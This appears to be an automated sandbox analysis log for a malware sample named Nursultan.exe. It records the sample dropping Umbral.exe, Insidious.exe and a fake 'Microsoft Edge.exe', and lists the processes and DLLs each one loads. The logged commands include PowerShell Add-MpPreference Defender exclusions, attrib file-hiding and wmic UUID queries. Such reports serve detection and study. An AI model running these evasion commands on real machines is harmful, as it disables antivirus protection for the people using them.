                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\nursultan.bat" "
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess created: C:\Users\user\AppData\Local\Temp\Insidious.exe "C:\Users\user\AppData\Local\Temp\Insidious.exe"
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess created: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe "C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe"
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess created: C:\Windows\System32\attrib.exe "attrib.exe" +h +s "C:\Users\user\AppData\Local\Temp\Umbral.exe"
                            Source: C:\Windows\System32\attrib.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess created: C:\Users\user\AppData\Local\Temp\Umbral.exe "C:\Users\user\AppData\Local\Temp\Umbral.exe"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Umbral.exe'
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess created: C:\Users\user\AppData\Local\Temp\Nursultan2.exe "C:\Users\user\AppData\Local\Temp\Nursultan2.exe"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess created: C:\Users\user\AppData\Local\Temp\Nursultan.exe "C:\Users\user\AppData\Local\Temp\Nursultan.exe"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 4 /nobreak
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mode.com mode con: cols=103 lines=21
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\nursultan.bat" "
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess created: C:\Users\user\AppData\Local\Temp\Insidious.exe "C:\Users\user\AppData\Local\Temp\Insidious.exe"
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess created: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe "C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe"
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess created: C:\Users\user\AppData\Local\Temp\Nursultan2.exe "C:\Users\user\AppData\Local\Temp\Nursultan2.exe"
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess created: C:\Users\user\AppData\Local\Temp\Nursultan.exe "C:\Users\user\AppData\Local\Temp\Nursultan.exe"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess created: C:\Users\user\AppData\Local\Temp\Umbral.exe "C:\Users\user\AppData\Local\Temp\Umbral.exe"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 4 /nobreak
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\nursultan.bat" "
                            Source: C:\Users\user\Desktop\Nursultan.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\timeout.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\Nursultan.exeProcess created: C:\Users\user\AppData\Local\Temp\Nursultan.exe "C:\Users\user\AppData\Local\Temp\Nursultan.exe" Jump to behavior
                            Source: C:\Users\user\Desktop\Nursultan.exeProcess created: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe "C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess created: C:\Users\user\AppData\Local\Temp\Nursultan2.exe "C:\Users\user\AppData\Local\Temp\Nursultan2.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess created: C:\Users\user\AppData\Local\Temp\Nursultan.exe "C:\Users\user\AppData\Local\Temp\Nursultan.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe'Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess created: C:\Users\user\AppData\Local\Temp\Umbral.exe "C:\Users\user\AppData\Local\Temp\Umbral.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\nursultan.bat" "Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess created: C:\Users\user\AppData\Local\Temp\Insidious.exe "C:\Users\user\AppData\Local\Temp\Insidious.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess created: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe "C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess created: C:\Users\user\AppData\Local\Temp\Umbral.exe "C:\Users\user\AppData\Local\Temp\Umbral.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess created: C:\Users\user\AppData\Local\Temp\Nursultan2.exe "C:\Users\user\AppData\Local\Temp\Nursultan2.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess created: C:\Users\user\AppData\Local\Temp\Nursultan.exe "C:\Users\user\AppData\Local\Temp\Nursultan.exe" Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 4 /nobreak
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mode.com mode con: cols=103 lines=21
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\nursultan.bat" "
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess created: C:\Users\user\AppData\Local\Temp\Insidious.exe "C:\Users\user\AppData\Local\Temp\Insidious.exe"
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess created: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe "C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe"
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess created: C:\Users\user\AppData\Local\Temp\Umbral.exe "C:\Users\user\AppData\Local\Temp\Umbral.exe"
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess created: C:\Users\user\AppData\Local\Temp\Nursultan2.exe "C:\Users\user\AppData\Local\Temp\Nursultan2.exe"
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess created: C:\Users\user\AppData\Local\Temp\Nursultan.exe "C:\Users\user\AppData\Local\Temp\Nursultan.exe"
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" csproduct get uuid
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess created: C:\Windows\System32\attrib.exe "attrib.exe" +h +s "C:\Users\user\AppData\Local\Temp\Umbral.exe"
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Umbral.exe'
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess created: unknown unknown
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess created: C:\Windows\System32\timeout.exe timeout 4 /nobreak
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess created: unknown unknown
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess created: unknown unknown
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess created: unknown unknown
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess created: unknown unknown
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess created: unknown unknown
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess created: C:\Windows\System32\timeout.exe timeout 4 /nobreak
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 4 /nobreak
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mode.com mode con: cols=103 lines=21
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\nursultan.bat" "
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess created: C:\Users\user\AppData\Local\Temp\Insidious.exe "C:\Users\user\AppData\Local\Temp\Insidious.exe"
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess created: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe "C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe"
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess created: C:\Users\user\AppData\Local\Temp\Umbral.exe "C:\Users\user\AppData\Local\Temp\Umbral.exe"
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess created: C:\Users\user\AppData\Local\Temp\Nursultan2.exe "C:\Users\user\AppData\Local\Temp\Nursultan2.exe"
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess created: C:\Users\user\AppData\Local\Temp\Nursultan.exe "C:\Users\user\AppData\Local\Temp\Nursultan.exe"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 4 /nobreak
                            Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\nursultan.bat" "
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess created: C:\Users\user\AppData\Local\Temp\Insidious.exe "C:\Users\user\AppData\Local\Temp\Insidious.exe"
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess created: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe "C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe"
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess created: C:\Users\user\AppData\Local\Temp\Umbral.exe "C:\Users\user\AppData\Local\Temp\Umbral.exe"
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess created: C:\Users\user\AppData\Local\Temp\Nursultan2.exe "C:\Users\user\AppData\Local\Temp\Nursultan2.exe"
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess created: C:\Users\user\AppData\Local\Temp\Nursultan.exe "C:\Users\user\AppData\Local\Temp\Nursultan.exe"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 4 /nobreak
                            Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\nursultan.bat" "
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess created: unknown unknown
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess created: unknown unknown
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess created: unknown unknown
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess created: unknown unknown
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd
                            Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                            Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                            Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                            Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                            Source: C:\Users\user\Desktop\Nursultan.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Users\user\Desktop\Nursultan.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\Desktop\Nursultan.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\Desktop\Nursultan.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\Desktop\Nursultan.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Users\user\Desktop\Nursultan.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\Desktop\Nursultan.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\Desktop\Nursultan.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\Desktop\Nursultan.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Users\user\Desktop\Nursultan.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Users\user\Desktop\Nursultan.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Users\user\Desktop\Nursultan.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\Desktop\Nursultan.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\Desktop\Nursultan.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Users\user\Desktop\Nursultan.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\Nursultan.exeSection loaded: edputil.dllJump to behavior
                            Source: C:\Users\user\Desktop\Nursultan.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Users\user\Desktop\Nursultan.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Users\user\Desktop\Nursultan.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Users\user\Desktop\Nursultan.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\user\Desktop\Nursultan.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                            Source: C:\Users\user\Desktop\Nursultan.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\Desktop\Nursultan.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\user\Desktop\Nursultan.exeSection loaded: appresolver.dllJump to behavior
                            Source: C:\Users\user\Desktop\Nursultan.exeSection loaded: bcp47langs.dllJump to behavior
                            Source: C:\Users\user\Desktop\Nursultan.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Users\user\Desktop\Nursultan.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Users\user\Desktop\Nursultan.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Users\user\Desktop\Nursultan.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                            Source: C:\Users\user\Desktop\Nursultan.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: edputil.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: appresolver.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: bcp47langs.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeSection loaded: wbemcomn.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeSection loaded: rasapi32.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeSection loaded: rasman.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeSection loaded: rtutils.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeSection loaded: dhcpcsvc6.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeSection loaded: dhcpcsvc.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeSection loaded: dnsapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeSection loaded: winnsi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeSection loaded: rasadhlp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeSection loaded: fwpuclnt.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeSection loaded: edputil.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeSection loaded: appresolver.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeSection loaded: bcp47langs.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeSection loaded: sxs.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeSection loaded: mpr.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeSection loaded: scrrun.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeSection loaded: linkinfo.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeSection loaded: ntshrui.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeSection loaded: cscapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeSection loaded: avicap32.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeSection loaded: msvfw32.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeSection loaded: winmm.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeSection loaded: winmm.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeSection loaded: mscoree.dllJump to behavior
